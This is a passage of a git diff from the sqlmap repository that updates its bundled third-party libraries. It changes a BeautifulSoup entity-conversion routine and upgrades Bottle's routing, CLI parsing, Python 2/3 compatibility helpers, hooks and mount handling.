__str__(self, encoding=DEFAULT_OUTPUT_ENCODING): + # Substitute outgoing XML entities. + data = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, self) if encoding: - return self.encode(encoding) + return data.encode(encoding) else: - return self + return data class CData(NavigableString): @@ -480,45 +507,34 @@ class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" - def _invert(h): - "Cheap function to invert a hash." - i = {} - for k,v in h.items(): - i[v] = k - return i - - XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", - "quot" : '"', - "amp" : "&", - "lt" : "<", - "gt" : ">" } - - XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) - def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" - x = match.group(1) - if self.convertHTMLEntities and x in name2codepoint: - return unichr(name2codepoint[x]) - elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: - if self.convertXMLEntities: - return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] - else: - return u'&%s;' % x - elif len(x) > 0 and x[0] == '#': - # Handle numeric entities - if len(x) > 1 and x[1] == 'x': - return unichr(int(x[2:], 16)) - else: - return unichr(int(x[1:])) + try: + x = match.group(1) + if self.convertHTMLEntities and x in name2codepoint: + return unichr(name2codepoint[x]) + elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: + if self.convertXMLEntities: + return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] + else: + return u'&%s;' % x + elif len(x) > 0 and x[0] == '#': + # Handle numeric entities + if len(x) > 1 and x[1] == 'x': + return unichr(int(x[2:], 16)) + else: + return unichr(int(x[1:])) - elif self.escapeUnrecognizedEntities: - return u'&%s;' % x - else: - return u'&%s;' % x + elif self.escapeUnrecognizedEntities: + return u'&%s;' % x + + except ValueError: # e.g. ValueError: unichr() arg not in range(0x10000) + pass + + return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): @@ -681,15 +697,6 @@ class Tag(PageElement): def __unicode__(self): return self.__str__(None) - BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" - + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" - + ")") - - def _sub_entity(self, x): - """Used with a regular expression to substitute the - appropriate XML entity for an XML special character.""" - return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" - def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and diff --git a/thirdparty/bottle/__init__.py b/thirdparty/bottle/__init__.py index 8d7bcd8f0..2ae28399f 100644 --- a/thirdparty/bottle/__init__.py +++ b/thirdparty/bottle/__init__.py @@ -1,8 +1 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - pass diff --git a/thirdparty/bottle/bottle.py b/thirdparty/bottle/bottle.py index 62c9010ea..a937493ba 100644 --- a/thirdparty/bottle/bottle.py +++ b/thirdparty/bottle/bottle.py @@ -2,68 +2,127 @@ # -*- coding: utf-8 -*- """ Bottle is a fast and simple micro-framework for small web applications. It -offers request dispatching (Routes) with url parameter support, templates, +offers request dispatching (Routes) with URL parameter support, templates, a built-in HTTP Server and adapters for many third party WSGI/HTTP-server and template engines - all in a single file and with no dependencies other than the Python Standard Library. Homepage and documentation: http://bottlepy.org/ -Copyright (c) 2012, Marcel Hellkamp. +Copyright (c) 2014, Marcel Hellkamp. License: MIT (see LICENSE for details) """ from __future__ import with_statement +import sys __author__ = 'Marcel Hellkamp' -__version__ = '0.12-dev' +__version__ = '0.13-dev' __license__ = 'MIT' -# The gevent server adapter needs to patch some modules before they are imported -# This is why we parse the commandline parameters here but handle them later -if __name__ == '__main__': +############################################################################### +# Command-line interface ######################################################## +############################################################################### +# INFO: Some server adapters need to monkey-patch std-lib modules before they +# are imported. This is why some of the command-line handling is done here, but +# the actual call to main() is at the end of the file. + + +def _cli_parse(args): from optparse import OptionParser - _cmd_parser = OptionParser(usage="usage: %prog [options] package.module:app") - _opt = _cmd_parser.add_option - _opt("--version", action="store_true", help="show version number.") - _opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") - _opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") - _opt("-p", "--plugin", action="append", help="install additional plugin/s.") - _opt("--debug", action="store_true", help="start server in debug mode.") - _opt("--reload", action="store_true", help="auto-reload on file changes.") - _cmd_options, _cmd_args = _cmd_parser.parse_args() - if _cmd_options.server and _cmd_options.server.startswith('gevent'): - import gevent.monkey; gevent.monkey.patch_all() + parser = OptionParser( + usage="usage: %prog [options] package.module:app") + opt = parser.add_option + opt("--version", action="store_true", help="show version number.") + opt("-b", "--bind", metavar="ADDRESS", help="bind socket to ADDRESS.") + opt("-s", "--server", default='wsgiref', help="use SERVER as backend.") + opt("-p", "--plugin", action="append", help="install additional plugin/s.") + opt("-c", "--conf", action="append", metavar="FILE", + help="load config values from FILE.") + opt("-C", "--param", action="append", metavar="NAME=VALUE", + help="override config values.") + opt("--debug", action="store_true", help="start server in debug mode.") + opt("--reload", action="store_true", help="auto-reload on file changes.") + opts, args = parser.parse_args(args[1:]) + + return opts, args, parser + + +def _cli_patch(args): + opts, _, _ = _cli_parse(args) + if opts.server: + if opts.server.startswith('gevent'): + import gevent.monkey + gevent.monkey.patch_all() + elif opts.server.startswith('eventlet'): + import eventlet + eventlet.monkey_patch() + + +if __name__ == '__main__': + _cli_patch(sys.argv) + +############################################################################### +# Imports and Python 2/3 unification ########################################### +############################################################################### + import base64, cgi, email.utils, functools, hmac, imp, itertools, mimetypes,\ - os, re, subprocess, sys, tempfile, threading, time, urllib, warnings + os, re, tempfile, threading, time, warnings +from types import FunctionType from datetime import date as datedate, datetime, timedelta from tempfile import TemporaryFile from traceback import format_exc, print_exc +from unicodedata import normalize -try: from json import dumps as json_dumps, loads as json_lds -except ImportError: # pragma: no cover - try: from simplejson import dumps as json_dumps, loads as json_lds +# inspect.getargspec was removed in Python 3.6, use +# Signature-based version where we can (Python 3.3+) +try: + from inspect import signature + def getargspec(func): + params = signature(func).parameters + args, varargs, keywords, defaults = [], None, None, [] + for name, param in params.items(): + if param.kind == param.VAR_POSITIONAL: + varargs = name + elif param.kind == param.VAR_KEYWORD: + keywords = name + else: + args.append(name) + if param.default is not param.empty: + defaults.append(param.default) + return (args, varargs, keywords, tuple(defaults) or None) +except ImportError: + from inspect import getargspec + +try: + from simplejson import dumps as json_dumps, loads as json_lds +except ImportError: # pragma: no cover + try: + from json import dumps as json_dumps, loads as json_lds except ImportError: - try: from django.utils.simplejson import dumps as json_dumps, loads as json_lds + try: + from django.utils.simplejson import dumps as json_dumps, loads as json_lds except ImportError: + def json_dumps(data): - raise ImportError("JSON support requires Python 2.6 or simplejson.") + raise ImportError( + "JSON support requires Python 2.6 or simplejson.") + json_lds = json_dumps - - # We now try to fix 2.5/2.6/3.1/3.2 incompatibilities. # It ain't pretty but it works... Sorry for the mess. -py = sys.version_info -py3k = py >= (3,0,0) -py25 = py < (2,6,0) -py31 = (3,1,0) <= py < (3,2,0) +py = sys.version_info +py3k = py >= (3, 0, 0) +py25 = py < (2, 6, 0) +py31 = (3, 1, 0) <= py < (3, 2, 0) # Workaround for the missing "as" keyword in py3k. -def _e(): return sys.exc_info()[1] +def _e(): + return sys.exc_info()[1] # Workaround for the "print is a keyword/function" Python 2/3 dilemma # and a fallback for mod_wsgi (resticts stdout/err attribute access) @@ -84,12 +143,16 @@ if py3k: from collections import MutableMapping as DictMixin import pickle from io import BytesIO + from configparser import ConfigParser, Error as ConfigParserError basestring = str unicode = str json_loads = lambda s: json_lds(touni(s)) callable = lambda x: hasattr(x, '__call__') imap = map -else: # 2.x + + def _raise(*a): + raise a[0](a[1]).with_traceback(a[2]) +else: # 2.x import httplib import thread from urlparse import urljoin, SplitResult as UrlSplitResult @@ -98,57 +161,75 @@ else: # 2.x from itertools import imap import cPickle as pickle from StringIO import StringIO as BytesIO + from ConfigParser import SafeConfigParser as ConfigParser, \ + Error as ConfigParserError if py25: msg = "Python 2.5 support may be dropped in future versions of Bottle." warnings.warn(msg, DeprecationWarning) from UserDict import DictMixin - def next(it): return it.next() + + def next(it): + return it.next() + bytes = str - else: # 2.6, 2.7 + else: # 2.6, 2.7 from collections import MutableMapping as DictMixin + unicode = unicode json_loads = json_lds + eval(compile('def _raise(*a): raise a[0], a[1], a[2]', '<py3fix>', 'exec')) + # Some helpers for string/byte handling def tob(s, enc='utf8'): return s.encode(enc) if isinstance(s, unicode) else bytes(s) + + def touni(s, enc='utf8', err='strict'): - return s.decode(enc, err) if isinstance(s, bytes) else unicode(s) + if isinstance(s, bytes): + return s.decode(enc, err) + else: + return unicode(s or ("" if s is None else s)) + + tonat = touni if py3k else tob # 3.2 fixes cgi.FieldStorage to accept bytes (which makes a lot of sense). # 3.1 needs a workaround. if py31: from io import TextIOWrapper - class NCTextIOWrapper(TextIOWrapper): - def close(self): pass # Keep wrapped buffer open. -# File uploads (which are implemented as empty FiledStorage instances...) -# have a negative truth value. That makes no sense, here is a fix. -class FieldStorage(cgi.FieldStorage): - def __nonzero__(self): return bool(self.list or self.file) - if py3k: __bool__ = __nonzero__ + class NCTextIOWrapper(TextIOWrapper): + def close(self): + pass # Keep wrapped buffer open. + # A bug in functools causes it to break if the wrapper is an instance method def update_wrapper(wrapper, wrapped, *a, **ka): - try: functools.update_wrapper(wrapper, wrapped, *a, **ka) - except AttributeError: pass - - + try: + functools.update_wrapper(wrapper, wrapped, *a, **ka) + except AttributeError: + pass # These helpers are used at module level and need to be defined first. # And yes, I know PEP-8, but sometimes a lower-case classname makes more sense. -def depr(message): + +def depr(message, strict=False): warnings.warn(message, DeprecationWarning, stacklevel=3) -def makelist(data): # This is just to handy - if isinstance(data, (tuple, list, set, dict)): return list(data) - elif data: return [data] - else: return [] + +def makelist(data): # This is just too handy + if isinstance(data, (tuple, list, set, dict)): + return list(data) + elif data: + return [data] + else: + return [] class DictProperty(object): - ''' Property that maps to a key in a local dict-like attribute. ''' + """ Property that maps to a key in a local dict-like attribute. """ + def __init__(self, attr, key=None, read_only=False): self.attr, self.key, self.read_only = attr, key, read_only @@ -173,11 +254,12 @@ class DictProperty(object): class cached_property(object): - ''' A property that is only computed once per instance and then replaces + """ A property that is only computed once per instance and then replaces itself with an ordinary attribute. Deleting the attribute resets the - property. ''' + property. """ def __init__(self, func): + self.__doc__ = getattr(func, '__doc__') self.func = func def __get__(self, obj, cls): @@ -187,7 +269,8 @@ class cached_property(object): class lazy_attribute(object): - ''' A property that caches itself to the class object. ''' + """ A property that caches itself to the class object. """ + def __init__(self, func): functools.update_wrapper(self, func, updated=[]) self.getter = func @@ -197,11 +280,6 @@ class lazy_attribute(object): setattr(cls, self.__name__, value) return value - - - - - ############################################################################### # Exceptions and Events ######################################################## ############################################################################### @@ -211,11 +289,6 @@ class BottleException(Exception): """ A base class for exceptions used by bottle. """ pass - - - - - ############################################################################### # Routing ###################################################################### ############################################################################### @@ -229,19 +302,31 @@ class RouteReset(BottleException): """ If raised by a plugin or request handler, the route is reset and all plugins are re-applied. """ -class RouterUnknownModeError(RouteError): pass + +class RouterUnknownModeError(RouteError): + + pass class RouteSyntaxError(RouteError): - """ The route parser found something not supported by this router """ + """ The route parser found something not supported by this router. """ class RouteBuildError(RouteError): - """ The route could not been built """ + """ The route could not be built. """ + + +def _re_flatten(p): + """ Turn all capturing groups in a regular expression pattern into + non-capturing groups. """ + if '(' not in p: + return p + return re.sub(r'(\\*)(\(\?P<[^>]+>|\((?!\?))', lambda m: m.group(0) if + len(m.group(1)) % 2 else m.group(1) + '(?:', p) class Router(object): - ''' A Router is an ordered collection of route->target pairs. It is used to + """ A Router is an ordered collection of route->target pairs. It is used to efficiently match WSGI requests against a number of routes and return the first target that satisfies the request. The target may be anything, usually a string, ID or callable object. A route consists of a path-rule @@ -250,177 +335,212 @@ class Router(object): The path-rule is either a static path (e.g. `/contact`) or a dynamic path that contains wildcards (e.g. `/wiki/<page>`). The wildcard syntax and details on the matching order are described in docs:`routing`. - ''' + """ default_pattern = '[^/]+' - default_filter = 're' - #: Sorry for the mess. It works. Trust me. - rule_syntax = re.compile('(\\\\*)'\ - '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)'\ - '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)'\ - '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') + default_filter = 're' + + #: The current CPython regexp implementation does not allow more + #: than 99 matching groups per regular expression. + _MAX_GROUPS_PER_PATTERN = 99 def __init__(self, strict=False): - self.rules = {} # A {rule: Rule} mapping - self.builder = {} # A rule/name->build_info mapping - self.static = {} # Cache for static routes: {path: {method: target}} - self.dynamic = [] # Cache for dynamic routes. See _compile() + self.rules = [] # All rules in order + self._groups = {} # index of regexes to find them in dyna_routes + self.builder = {} # Data structure for the url builder + self.static = {} # Search structure for static routes + self.dyna_routes = {} + self.dyna_regexes = {} # Search structure for dynamic routes #: If true, static routes are no longer checked first. self.strict_order = strict - self.filters = {'re': self.re_filter, 'int': self.int_filter, - 'float': self.float_filter, 'path': self.path_filter} - - def re_filter(self, conf): - return conf or self.default_pattern, None, None - - def int_filter(self, conf): - return r'-?\d+', int, lambda x: str(int(x)) - - def float_filter(self, conf): - return r'-?[\d.]+', float, lambda x: str(float(x)) - - def path_filter(self, conf): - return r'.+?', None, None + self.filters = { + 're': lambda conf: (_re_flatten(conf or self.default_pattern), + None, None), + 'int': lambda conf: (r'-?\d+', int, lambda x: str(int(x))), + 'float': lambda conf: (r'-?[\d.]+', float, lambda x: str(float(x))), + 'path': lambda conf: (r'.+?', None, None) + } def add_filter(self, name, func): - ''' Add a filter. The provided function is called with the configuration + """ Add a filter. The provided function is called with the configuration string as parameter and must return a (regexp, to_python, to_url) tuple. - The first element is a string, the last two are callables or None. ''' + The first element is a string, the last two are callables or None. """ self.filters[name] = func - def parse_rule(self, rule): - ''' Parses a rule into a (name, filter, conf) token stream. If mode is - None, name contains a static rule part. ''' + rule_syntax = re.compile('(\\\\*)' + '(?:(?::([a-zA-Z_][a-zA-Z_0-9]*)?()(?:#(.*?)#)?)' + '|(?:<([a-zA-Z_][a-zA-Z_0-9]*)?(?::([a-zA-Z_]*)' + '(?::((?:\\\\.|[^\\\\>]+)+)?)?)?>))') + + def _itertokens(self, rule): offset, prefix = 0, '' for match in self.rule_syntax.finditer(rule): prefix += rule[offset:match.start()] g = match.groups() - if len(g[0])%2: # Escaped wildcard + if len(g[0]) % 2: # Escaped wildcard prefix += match.group(0)[len(g[0]):] offset = match.end() continue - if prefix: yield prefix, None, None - name, filtr, conf = g[1:4] if not g[2] is None else g[4:7] - if not filtr: filtr = self.default_filter - yield name, filtr, conf or None + if prefix: + yield prefix, None, None + name, filtr, conf = g[4:7] if g[2] is None else g[1:4] + yield name, filtr or 'default', conf or None offset, prefix = match.end(), '' if offset <= len(rule) or prefix: - yield prefix+rule[offset:], None, None + yield prefix + rule[offset:], None, None def add(self, rule, method, target, name=None): - ''' Add a new route or replace the target for an existing route. ''' - if rule in self.rules: - self.rules[rule][method] = target - if name: self.builder[name] = self.builder[rule] - return - - target = self.rules[rule] = {method: target} - - # Build pattern and other structures for dynamic routes - anons = 0 # Number of anonymous wildcards - pattern = '' # Regular expression pattern - filters = [] # Lists of wildcard input filters - builder = [] # Data structure for the URL builder + """ Add a new rule or replace the target for an existing rule. """ + anons = 0 # Number of anonymous wildcards found + keys = [] # Names of keys + pattern = '' # Regular expression pattern with named groups + filters = [] # Lists of wildcard input filters + builder = [] # Data structure for the URL builder is_static = True - for key, mode, conf in self.parse_rule(rule): + + for key, mode, conf in self._itertokens(rule): if mode: is_static = False + if mode == 'default': mode = self.default_filter mask, in_filter, out_filter = self.filters[mode](conf) - if key: - pattern += '(?P<%s>%s)' % (key, mask) - else: + if not key: pattern += '(?:%s)' % mask - key = 'anon%d' % anons; anons += 1 + key = 'anon%d' % anons + anons += 1 + else: + pattern += '(?P<%s>%s)' % (key, mask) + keys.append(key) if in_filter: filters.append((key, in_filter)) builder.append((key, out_filter or str)) elif key: pattern += re.escape(key) builder.append((None, key)) + self.builder[rule] = builder if name: self.builder[name] = builder if is_static and not self.strict_order: - self.static[self.build(rule)] = target + self.static.setdefault(method, {}) + self.static[method][self.build(rule)] = (target, None) return - def fpat_sub(m): - return m.group(0) if len(m.group(1)) % 2 else m.group(1) + '(?:' - flat_pattern = re.sub(r'(\\*)(\(\?P<[^>]*>|\((?!\?))', fpat_sub, pattern) - try: - re_match = re.compile('^(%s)$' % pattern).match + re_pattern = re.compile('^(%s)$' % pattern) + re_match = re_pattern.match except re.error: - raise RouteSyntaxError("Could not add Route: %s (%s)" % (rule, _e())) + raise RouteSyntaxError("Could not add Route: %s (%s)" % + (rule, _e())) - def match(path): - """ Return an url-argument dictionary. """ - url_args = re_match(path).groupdict() - for name, wildcard_filter in filters: - try: - url_args[name] = wildcard_filter(url_args[name]) - except ValueError: - raise HTTPError(400, 'Path has wrong format.') - return url_args + if filters: - try: - combined = '%s|(^%s$)' % (self.dynamic[-1][0].pattern, flat_pattern) - self.dynamic[-1] = (re.compile(combined), self.dynamic[-1][1]) - self.dynamic[-1][1].append((match, target)) - except (AssertionError, IndexError): # AssertionError: Too many groups - self.dynamic.append((re.compile('(^%s$)' % flat_pattern), - [(match, target)])) - return match + def getargs(path): + url_args = re_match(path).groupdict() + for name, wildcard_filter in filters: + try: + url_args[name] = wildcard_filter(url_args[name]) + except ValueError: + raise HTTPError(400, 'Path has wrong format.') + return url_args + elif re_pattern.groupindex: + + def getargs(path): + return re_match(path).groupdict() + else: + getargs = None + + flatpat = _re_flatten(pattern) + whole_rule = (rule, flatpat, target, getargs) + + if (flatpat, method) in self._groups: + if DEBUG: + msg = 'Route <%s %s> overwrites a previously defined route' + warnings.warn(msg % (method, rule), RuntimeWarning) + self.dyna_routes[method][ + self._groups[flatpat, method]] = whole_rule + else: + self.dyna_routes.setdefault(method, []).append(whole_rule) + self._groups[flatpat, method] = len(self.dyna_routes[method]) - 1 + + self._compile(method) + + def _compile(self, method): + all_rules = self.dyna_routes[method] + comborules = self.dyna_regexes[method] = [] + maxgroups = self._MAX_GROUPS_PER_PATTERN + for x in range(0, len(all_rules), maxgroups): + some = all_rules[x:x + maxgroups] + combined = (flatpat for (_, flatpat, _, _) in some) + combined = '|'.join('(^%s$)' % flatpat for flatpat in combined) + combined = re.compile(combined).match + rules = [(target, getargs) for (_, _, target, getargs) in some] + comborules.append((combined, rules)) def build(self, _name, *anons, **query): - ''' Build an URL by filling the wildcards in a rule. ''' + """ Build an URL by filling the wildcards in a rule. """ builder = self.builder.get(_name) - if not builder: raise RouteBuildError("No route with that name.", _name) + if not builder: + raise RouteBuildError("No route with that name.", _name) try: - for i, value in enumerate(anons): query['anon%d'%i] = value - url = ''.join([f(query.pop(n)) if n else f for (n,f) in builder]) - return url if not query else url+'?'+urlencode(query) + for i, value in enumerate(anons): + query['anon%d' % i] = value + url = ''.join([f(query.pop(n)) if n else f for (n, f) in builder]) + return url if not query else url + '?' + urlencode(query) except KeyError: raise RouteBuildError('Missing URL argument: %r' % _e().args[0]) def match(self, environ): - ''' Return a (target, url_agrs) tuple or raise HTTPError(400/404/405). ''' - path, targets, urlargs = environ['PATH_INFO'] or '/', None, {} - if path in self.static: - targets = self.static[path] - else: - for combined, rules in self.dynamic: - match = combined.match(path) - if not match: continue - getargs, targets = rules[match.lastindex - 1] - urlargs = getargs(path) if getargs else {} - break + """ Return a (target, url_args) tuple or raise HTTPError(400/404/405). """ + verb = environ['REQUEST_METHOD'].upper() + path = environ['PATH_INFO'] or '/' - if not targets: - raise HTTPError(404, "Not found: " + repr(environ['PATH_INFO'])) - method = environ['REQUEST_METHOD'].upper() - if method in targets: - return targets[method], urlargs - if method == 'HEAD' and 'GET' in targets: - return targets['GET'], urlargs - if 'ANY' in targets: - return targets['ANY'], urlargs - allowed = [verb for verb in targets if verb != 'ANY'] - if 'GET' in allowed and 'HEAD' not in allowed: - allowed.append('HEAD') - raise HTTPError(405, "Method not allowed.", Allow=",".join(allowed)) + if verb == 'HEAD': + methods = ['PROXY', verb, 'GET', 'ANY'] + else: + methods = ['PROXY', verb, 'ANY'] + + for method in methods: + if method in self.static and path in self.static[method]: + target, getargs = self.static[method][path] + return target, getargs(path) if getargs else {} + elif method in self.dyna_regexes: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + target, getargs = rules[match.lastindex - 1] + return target, getargs(path) if getargs else {} + + # No matching route found. Collect alternative methods for 405 response + allowed = set([]) + nocheck = set(methods) + for method in set(self.static) - nocheck: + if path in self.static[method]: + allowed.add(verb) + for method in set(self.dyna_regexes) - allowed - nocheck: + for combined, rules in self.dyna_regexes[method]: + match = combined(path) + if match: + allowed.add(method) + if allowed: + allow_header = ",".join(sorted(allowed)) + raise HTTPError(405, "Method not allowed.", Allow=allow_header) + + # No matching route and no alternative method found. We give up + raise HTTPError(404, "Not found: " + repr(path)) class Route(object): - ''' This class wraps a route callback along with route specific metadata and + """ This class wraps a route callback along with route specific metadata and configuration and applies Plugins on demand. It is also responsible for turing an URL path rule into a regular expression usable by the Router. - ''' + """ - def __init__(self, app, rule, method, callback, name=None, - plugins=None, skiplist=None, **config): + def __init__(self, app, rule, method, callback, + name=None, + plugins=None, + skiplist=None, **config): #: The application this route is installed to. self.app = app - #: The path-rule string (e.g. ``/wiki/:page``). + #: The path-rule string (e.g. ``/wiki/<page>``). self.rule = rule #: The HTTP method as a string (e.g. ``GET``). self.method = method @@ -435,38 +555,25 @@ class Route(object): #: Additional keyword arguments passed to the :meth:`Bottle.route` #: decorator are stored in this dictionary. Used for route-specific #: plugin configuration and meta-data. - self.config = ConfigDict(config) - - def __call__(self, *a, **ka): - depr("Some APIs changed to return Route() instances instead of"\ - " callables. Make sure to use the Route.call method and not to"\ - " call Route instances directly.") - return self.call(*a, **ka) + self.config = ConfigDict().load_dict(config) @cached_property def call(self): - ''' The route callback with all plugins applied. This property is - created on demand and then cached to speed up subsequent requests.''' + """ The route callback with all plugins applied. This property is + created on demand and then cached to speed up subsequent requests.""" return self._make_callback() def reset(self): - ''' Forget any cached values. The next time :attr:`call` is accessed, - all plugins are re-applied. ''' + """ Forget any cached values. The next time :attr:`call` is accessed, + all plugins are re-applied. """ self.__dict__.pop('call', None) def prepare(self): - ''' Do all on-demand work immediately (useful for debugging).''' + """ Do all on-demand work immediately (useful for debugging).""" self.call - @property - def _context(self): - depr('Switch to Plugin API v2 and access the Route object directly.') - return dict(rule=self.rule, method=self.method, callback=self.callback, - name=self.name, app=self.app, config=self.config, - apply=self.plugins, skip=self.skiplist) - def all_plugins(self): - ''' Yield all Plugins affecting this route. ''' + """ Yield all Plugins affecting this route. """ unique = set() for p in reversed(self.app.plugins + self.plugins): if True in self.skiplist: break @@ -481,24 +588,49 @@ class Route(object): for plugin in self.all_plugins(): try: if hasattr(plugin, 'apply'): - api = getattr(plugin, 'api', 1) - context = self if api > 1 else self._context - callback = plugin.apply(callback, context) + callback = plugin.apply(callback, self) else: callback = plugin(callback) - except RouteReset: # Try again with changed configuration. + except RouteReset: # Try again with changed configuration. return self._make_callback() if not callback is self.callback: update_wrapper(callback, self.callback) return callback + def get_undecorated_callback(self): + """ Return the callback. If the callback is a decorated function, try to + recover the original function. """ + func = self.callback + func = getattr(func, '__func__' if py3k else 'im_func', func) + closure_attr = '__closure__' if py3k else 'func_closure' + while hasattr(func, closure_attr) and getattr(func, closure_attr): + attributes = getattr(func, closure_attr) + func = attributes[0].cell_contents + + # in case of decorators with multiple arguments + if not isinstance(func, FunctionType): + # pick first FunctionType instance from multiple arguments + func = filter(lambda x: isinstance(x, FunctionType), + map(lambda x: x.cell_contents, attributes)) + func = list(func)[0] # py3 support + return func + + def get_callback_args(self): + """ Return a list of argument names the callback (most likely) accepts + as keyword arguments. If the callback is a decorated function, try + to recover the original function before inspection. """ + return getargspec(self.get_undecorated_callback())[0] + + def get_config(self, key, default=None): + """ Lookup a config field and return its value, first checking the + route.config, then route.app.config.""" + for conf in (self.config, self.app.config): + if key in conf: return conf[key] + return default + def __repr__(self): - return '<%s %r %r>' % (self.method, self.rule, self.callback) - - - - - + cb = self.get_undecorated_callback() + return '<%s %r %r>' % (self.method, self.rule, cb) ############################################################################### # Application Object ########################################################### @@ -515,31 +647,75 @@ class Bottle(object): """ def __init__(self, catchall=True, autojson=True): - #: If true, most exceptions are caught and returned as :exc:`HTTPError` - self.catchall = catchall + #: A :class:`ConfigDict` for app specific configuration. + self.config = ConfigDict() + self.config._on_change = functools.partial(self.trigger_hook, 'config') + self.config.meta_set('autojson', 'validate', bool) + self.config.meta_set('catchall', 'validate', bool) + self.config['catchall'] = catchall + self.config['autojson'] = autojson #: A :class:`ResourceManager` for application files self.resources = ResourceManager() - #: A :class:`ConfigDict` for app specific configuration. - self.config = ConfigDict() - self.config.autojson = autojson - - self.routes = [] # List of installed :class:`Route` instances. - self.router = Router() # Maps requests to :class:`Route` instances. + self.routes = [] # List of installed :class:`Route` instances. + self.router = Router() # Maps requests to :class:`Route` instances. self.error_handler = {} # Core plugins - self.plugins = [] # List of installed plugins. - self.hooks = HooksPlugin() - self.install(self.hooks) - if self.config.autojson: + self.plugins = [] # List of installed plugins. + if self.config['autojson']: self.install(JSONPlugin()) self.install(TemplatePlugin()) + #: If true, most exceptions are caught and returned as :exc:`HTTPError` + catchall = DictProperty('config', 'catchall') + + __hook_names = 'before_request', 'after_request', 'app_reset', 'config' + __hook_reversed = 'after_request' + + @cached_property + def _hooks(self): + return dict((name, []) for name in self.__hook_names) + + def add_hook(self, name, func): + """ Attach a callback to a hook. Three hooks are currently implemented: + + before_request + Executed once before each request. The request context is + available, but no routing has happened yet. + after_request + Executed once after each request regardless of its outcome. + app_reset + Called whenever :meth:`Bottle.reset` is called. + """ + if name in self.__hook_reversed: + self._hooks[name].insert(0, func) + else: + self._hooks[name].append(func) + + def remove_hook(self, name, func): + """ Remove a callback from a hook. """ + if name in self._hooks and func in self._hooks[name]: + self._hooks[name].remove(func) + return True + + def trigger_hook(self, __name, *args, **kwargs): + """ Trigger a hook and return a list of results. """ + return [hook(*args, **kwargs) for hook in self._hooks[__name][:]] + + def hook(self, name): + """ Return a decorator that attaches a callback to a hook. See + :meth:`add_hook` for details.""" + + def decorator(func): + self.add_hook(name, func) + return func + + return decorator def mount(self, prefix, app, **options): - ''' Mount an application (:class:`Bottle` or plain WSGI) to a specific + """ Mount an application (:class:`Bottle` or plain WSGI) to a specific URL prefix. Example:: root_app.mount('/admin/', admin_app) @@ -549,10 +725,7 @@ class Bottle(object): :param app: an instance of :class:`Bottle` or a WSGI application. All other parameters are passed to the underlying :meth:`route` call. - ''' - if isinstance(app, basestring): - prefix, app = app, prefix - depr('Parameter order of Bottle.mount() changed.') # 0.10 + """ segments = [p for p in prefix.split('/') if p] if not segments: raise ValueError('Empty path prefix.') @@ -561,19 +734,24 @@ class Bottle(object): def mountpoint_wrapper(): try: request.path_shift(path_depth) - rs = BaseResponse([], 200) - def start_response(status, header): + rs = HTTPResponse([]) + + def start_response(status, headerlist, exc_info=None): + if exc_info: + _raise(*exc_info) rs.status = status - for name, value in header: rs.add_header(name, value) + for name, value in headerlist: + rs.add_header(name, value) return rs.body.append + body = app(request.environ, start_response) - body = itertools.chain(rs.body, body) - return HTTPResponse(body, rs.status_code, **rs.headers) + rs.body = itertools.chain(rs.body, body) if rs.body else body + return rs finally: request.path_shift(-path_depth) options.setdefault('skip', True) - options.setdefault('method', 'ANY') + options.setdefault('method', 'PROXY') options.setdefault('mountpoint', {'prefix': prefix, 'target': app}) options['callback'] = mountpoint_wrapper @@ -582,20 +760,20 @@ class Bottle(object): self.route('/' + '/'.join(segments), **options) def merge(self, routes): - ''' Merge the routes of another :class:`Bottle` application or a list of + """ Merge the routes of another :class:`Bottle` application or a list of :class:`Route` objects into this application. The routes keep their 'owner', meaning that the :data:`Route.app` attribute is not - changed. ''' + changed. """ if isinstance(routes, Bottle): routes = routes.routes for route in routes: self.add_route(route) def install(self, plugin): - ''' Add a plugin to the list of plugins and prepare it for being + """ Add a plugin to the list of plugins and prepare it for being applied to all routes of this application. A plugin may be a simple decorator or an object that implements the :class:`Plugin` API. - ''' + """ if hasattr(plugin, 'setup'): plugin.setup(self) if not callable(plugin) and not hasattr(plugin, 'apply'): raise TypeError("Plugins must be callable or implement .apply()") @@ -604,10 +782,10 @@ class Bottle(object): return plugin def uninstall(self, plugin): - ''' Uninstall plugins. Pass an instance to remove a specific plugin, a type + """ Uninstall plugins. Pass an instance to remove a specific plugin, a type object to remove all plugins that match that type, a string to remove all plugins with a matching ``name`` attribute or ``True`` to remove all - plugins. Return the list of removed plugins. ''' + plugins. Return the list of removed plugins. """ removed, remove = [], plugin for i, plugin in list(enumerate(self.plugins))[::-1]: if remove is True or remove is plugin or remove is type(plugin) \ @@ -618,27 +796,28 @@ class Bottle(object): if removed: self.reset() return removed - def run(self, **kwargs): - ''' Calls :func:`run` with the same parameters. ''' - run(self, **kwargs) - def reset(self, route=None): - ''' Reset all routes (force plugins to be re-applied) and clear all + """ Reset all routes (force plugins to be re-applied) and clear all caches. If an ID or route object is given, only that specific route - is affected. ''' + is affected. """ if route is None: routes = self.routes elif isinstance(route, Route): routes = [route] else: routes = [self.routes[route]] - for route in routes: route.reset() + for route in routes: + route.reset() if DEBUG: - for route in routes: route.prepare() - self.hooks.trigger('app_reset') + for route in routes: + 